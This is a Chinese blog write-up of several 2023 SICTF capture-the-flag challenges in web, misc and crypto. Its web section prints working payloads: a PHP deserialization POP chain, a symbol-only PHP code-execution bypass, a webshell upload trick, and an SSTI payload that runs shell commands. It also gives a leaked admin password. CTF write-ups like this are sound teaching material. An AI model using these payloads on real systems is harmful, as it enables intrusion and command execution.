2023SICTF部分wp

最新推荐文章于 2024-03-04 22:16:36 发布
最新推荐文章于 2024-03-04 22:16:36 发布
阅读量1.1k 收藏 1
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/128729250
版权

这里写目录标题

WEB

兔年大吉
首先找到利用点
在Happy类中有一个
Call_user_func()函数

  1. 当访问不存在方法时调用__call,于是在Nevv类中发现check()方法, 在这里插入图片描述所有类都没有该方法
  2. 当将类作为函数调用的时候执行__invoke,于是在这里插入图片描述
  3. 访问不存在的方法的时候执行__get,于是

在这里插入图片描述
那么为什么不是Year类中的firecrackers()方法呢?在该方法中进行的是赋值,会调用__set而不是__get

  1. 上面说了,对无法访问的属性进行赋值会调用__set,所以在这里插入图片描述
    5.在这里插入图片描述
    于是构造代码如下
<?php
class Happy{
    private $cmd="system";
    private $content="tac /flag";
}
class Nevv{
    private $happiness;
    public function __construct($happiness){
        $this->happiness = $happiness;
    }
}
class Rabbit{
    private $aspiration;
    public function __construct($aspiration){
        $this->aspiration = $aspiration;
    }
    public function __set($name,$val){
        return @$this->aspiration->family;//3
    }
}
class Year{
    public $key="happy new year";
    public $rabbit;
}
$pop = new Year();
$Y = new Year();
$Y->rabbit = new Nevv(new Happy());
$R = new Rabbit($Y);
$pop->rabbit = $R;
$R->aspiration = 1;
echo urlencode((serialize($pop)));

exp:O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A18%3A%22%00Rabbit%00aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A15%3A%22%00Nevv%00happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A9%3A%22tac+%2Fflag%22%3B%7D%7D%7D%7D%7D
ezbypass
在这里插入图片描述

可用的字符为
! $ ’ ( ) + , . / ; = [ ] _
最终exp
$%DF=(_/_._)['!'=='_'];$_=%2B%2B$%DF;$%DE=_;$%DE.=%2B%2B$_.$%DF;$_%2B%2B;$_%2B%2B;$%DE.=%2B%2B$_;$%DE.=%2B%2B$_;$$%DE[__]($$%DE[_]);&__=system&_=cat /flag

含义

$%DF=(_/_._)[!==_];//NAN
$_=++$%DF;//O
$%DE=_;//_
$%DE.=++$_.$%DF;//_P
$_++;//Q
$_++;//R
$%DE.=++$_;//_POS
$%DE.=++$_;//_POST
$$%DE[__]($$%DE[_]);//$_POST[__]($_POST[_])

用hackbar打不上去,建议用bp打,也可能是我操作的问题
ezupload
在这里插入图片描述黑名单中没有php,有pHp但是没用,因为在判断的时候会先转小写
所以小马可以直接传上去
我们传上去的文件会被重命名移动到upload’.‘/’.date(“His”).rand(114,514).$file_ext
本地生成date
在这里插入图片描述
然后由于我们不知道上传的时候date是什么,所以干脆bp多传几个,然后在这个时间段内随便找一个date去打
在这里插入图片描述
在上传的过程中本地生成一个date值,然后bp跑114到514
在这里插入图片描述
访问该路径
在这里插入图片描述

SSTI
F12说GET提交SI
过滤了很多关键字,最终exp
{%print( lipsum['__glo'+'bals__'].os['po'+'pen']('tac /ga1f').read() )%}
ezphp
未修复在这里插入图片描述
未修复的时候顺便读了下db.php在这里插入图片描述
结果修复之后密码没改
admin
0909876qwe222
直接登录
然后admin.php界面post提交url=index.php在这里插入图片描述
再提交x9ad.php

在这里插入图片描述
发现是反序列化
在这里插入图片描述

exp:TzoxOiJhIjoxOntzOjY6IgAqAGNtZCI7czoyMDoic3lzdGVtKCd0YWMgL2ZsYWcnKTsiO30

MISC

签到打卡完成
传不了图
向公众号发SICTF,得到flag
Color
Stegsolve打开图片,random color map 多换几个,能出个可以扫的码
扫码得到flag

CRYPTO

Ascii
异或3之后base32 base64
babyRsa
由代码可得n是由多个小的素数得到的,factor分解
然后工具一把梭
在这里插入图片描述
Polyrsa
pq为多项式,计算k
在这里插入图片描述
然后算出pq工具一把梭在这里插入图片描述

sage代码如下

n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
PR.<k> = PolynomialRing(ZZ)
p = 18*k**5 + 9*k**4 - 20*k**3 - 144*k + 47527
q = k**6 + 22*k**3 - 149*k**2 - 14*k + 39293
n0 = p * q
f = n - n0
sol = f.roots()
print(sol)
丨Arcueid丨
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能用。 这是一个Win32的API,用C语言写的,在托管代码中可以dll import,再调用,和在桌面的.NET程序的互操作是一样的。在WP 8中是要先创建一个Windows运行时组件项目,并在项目中dll import,然后在主项目中引用组件才能调用,前不久,我在MSDN的社区中看到有位仁兄说,在8.1上是不用建运行时组件的,你喜欢在哪引入dll函数都能调用。于是,昨晚我试了一下,果然,在8.1上是不用建Windows运行时组件项目就能调用。 详细说明:http://wp.662p.com/thread-8301-1-1.html
SICTF 2024
weixin_45906533的博客
02-21 459
那就很明显了,联合查询user()发现最高权限是root,然后我就试试能不能读取文件,发现load_file可以读取\。跑了一遍字典,发现注入的东西有很多,空格、or、and,但是没有禁用union和select。由于这是thinkphp框架写的,所以网站的首页是在app----controller目录里。还有两题Java,比赛到后面的时候也没时间去解了,跑去看vnctf了。成功的来到了这里,接下来就是一个老生常谈的一个考点了,环境变量注入。很简单的逻辑,就是md5弱比较、正则回溯,然后反序列化而已。
2023年江西省工业互联网大赛WP
12-25
2023年江西省工业互联网大赛WP
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
UNCTF2021 部分wp.pdf
12-10
unctf2021
SICTF 2023 真题
09-10
SICTF 2023 真题
2023 SICTF --- wp
3tefanie丶zhou的博客
01-19 4974
【观海者难为水,痴心者难为情,男女情爱之苦乐,不过是意中人变成了忆中人,心上人变成了枕边人。】
SICTF2023 misc-wp
网安小菜鸡
01-20 1255
misc杂项
2023SICTF ROUND2 baby_heap
臭nana的博客
09-12 351
就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。
[]SICTF2023 web WP
网安小菜鸡
01-20 377
web wp
sictf-web-wp
最新发布
m0_73255659的博客
03-04 378
直接进 一眼反序列化但是 url设置成为127.0.0.1/flag 无法读取提示 隐藏了其他文件 扫描目录 那我们就可以看看他有什么文件 目录扫描看到admin.php进去admin.php直接利用首页的反序列化和ssrf 访问admin.php可以构造。
青少年CTF Crypto Babyrsa
qq_41818842的博客
08-26 131
根据n=p*q,f(n)=(p-1)*(q-1)以及第一二条提示可推断出n=(p+1)*(q+1)-(p+q)-1。先用7-Zip进行压缩 然后用PyCharm打开(注意如果直接打开会乱码)打开之后发现是十六进制 给了e,d,和c 那么只要求出n即可写脚本。m:密文c使用私钥指数d进行解密明文。e: RSA加密的公钥指数e的值。d:RSA解密的私钥指数d的值。: RSA加密后的密文c的值。此题不需要知道q,p。
SICTF2023——Crypto
m0_73550830的博客
09-10 161
首发于more。
SICTF2023-Crypto-wp
网安小菜鸡
01-20 525
密码wp
2023SICTF-web-白猫-[签到]Include
m0_73734159的博客
11-28 657
题目名称:[签到]Include#题目简介:flag位于flag.php,是一个非常简单的文件包含捏~#题目环境:#函数理解:substr() 函数返回字符串的一部分如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。语法参数string,必需,规定要返回其中一部分的字符串参数start,必需,规定在字符串的何处开始正数 - 在字符串的指定位置开始负数 - 在从字符串结尾开始的指定位置开始。
[SICTF2023] Misc 高质量 WriteUp
qq_47875210的博客
01-19 2787
这道题目很早就出来了,但是一直没师傅做,我也不知道为嘛,那个时候没进比赛群,然后我就说我来试试,然后遇到了题目的出错的问题。注意:这个题目他用了一个randit(0, 2),这个函数就会导致可能是在B通道,可能是在G通道,或者是在R通道,也就是说0的时候是B通道,1的时候是G通道,2的时候是R通道,因为cv2读取图片后就是BGR的通道顺序。这个题目不知道怎么评价,因为他的出题的那个脚本,我把逆代码写出来后还是得不到清楚的图片,因为我已经做出来了,就找树木反应,树木给了正确解题代码,然后拿到正确解题代码。
SICTF2023 Osint-wp
网安小菜鸡
01-20 560
社工
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: ...根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值